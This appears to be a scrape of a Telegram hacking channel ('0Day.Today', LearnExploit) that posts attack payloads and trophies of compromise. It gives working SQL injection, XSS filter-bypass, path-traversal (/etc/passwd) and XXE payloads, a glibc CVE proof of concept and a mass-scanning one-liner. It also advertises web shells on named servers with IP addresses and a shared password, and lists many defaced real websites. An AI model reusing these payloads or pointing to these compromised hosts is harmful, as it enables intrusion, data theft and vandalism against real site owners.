Blind SQL Injection payload
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1
On demand query API for Threat-Intel project.
apiosintDS is a python client library for public API lookup service over OSINT IoCs stored at DigitalSide Threat-Intel repository. It can be defined a Service as a Library tool designed to act both as a standard Python library to be included in your own Python application and as command line tool. Query can be performed against souspicious IPs, domains, urls and file hashes. Data stored has a 7 days retention.
The easy way via pip:
pip3 install apiosintDS
`apiosintDS
python3 -m pip install .`
apiosintDS -e 7cb796c875cccc9233d82854a4e2fdf0
apiosintDS -e h[REMOVED]p://193.35.18.147/bins/k.arm -st -p -nc
LearnExploit
#api #ioc #cybersecurity
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍3❤1
<Img Src=javascript:alert(1)>
OnError=location=src
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E
#XSS
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9⚡2❤2❤🔥1
PHP: 7.0.33
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 208.109.13.219 [🇸🇬]
HDD: Total:149.99 GB
Free:28.53 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gzip nc
Downloader: wgetl ynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
pwd: bugcod3
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4👍2🔥1
http://buildingtheblocks.life/
https://acmroofquote.com/BugCod3.html
http://ampacplumber.org/
http://bovbiz.com/
http://bucketwishconnection.com/
http://dailyhomesolutions.net/
https://dev1.shhdev.info/
http://dxperformance.com/
http://dxperformanceai.com/
http://eganpaintingpgh.com/
http://favoritedaycleaning.com/
http://fortuiteacafe.com/
http://goodworkstreeandlawn.com/
http://hirshcandies.com/
http://mind4mfg.com/
http://missionpso.org/
http://rlholliday.com/
http://shhdev.info/
http://shoreshdavid.com/
http://sunindustrial.dxpdev.site/
http://thepayrollshoppe.com/
http://trebedesign.com/
http://workbusinesssolutions.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1
PHP: 8.2.15
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 50.116.94.196 [🇺🇸]
Domains: 428 domains
HDD: Total:393.53 GB
Free:21.53 GB [5%]
Useful : make php perl python ruby tar gzip nc
Downloader: wget lynx links curl lwp-mirror
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍4⚡2
Akamai WAF
Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5🔥2👍1
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC :
(exec -a "
printf '%0128000x' 1
" /usr/bin/su < /dev/null)#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍3🔥2
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
javascript:var{a:onerror}={a:alert};throw%20document.domain
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4⚡3🔥3👍1
[+] FIlter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions
POC:
#AEMSecurity #FilterBypass #bugbountytips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Sometimes you can do amazing things just by appending /? to bypass access control restrictions
POC:
https://targetdomain/api/endpoint
<-- Access Deniedhttps://targetdomain/api/endpoint/?
<--- Access to entire customer database#AEMSecurity #FilterBypass #bugbountytips
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8❤4👍1🔥1
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Payload
'
or 1=1 -- -
bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'--
executing a 5s delay#VPD #BugBounty #security
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2👍1🔥1
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
cd PacketSpy
pip install -r requirements.txt
python3 packetspy.py --help
#Device Detection
python3 packetspy.py -tf 10.0.2.0/24 -i eth0
#Man-in-the-Middle Sniffing
python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
LearnExploit
#Python #Network #Packet #Sniffing #Tools
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5👍4❤2🔥1
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/
Country:
#Deface
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🔥3❤1
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [🇮🇹 ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
🔗 Link
Enjoy...⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 213.158.95.90 [
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
Enjoy...
#Shell
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7👍3❤1🔥1
CloudFlare Bypass
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=alert(1)>
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡11❤1
LFI Payload⚡️
Payload:
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡10❤3❤🔥1🔥1
0Day.Today | Learn Exploit | Zero World | Dark web |
LFI Payload⚡️ Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #LFI #Payload —————— 0Day.Today @LearnExploit @Tech_Army
Sick Finding 🥵⚡️
#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt
#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10👍2
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥7👍4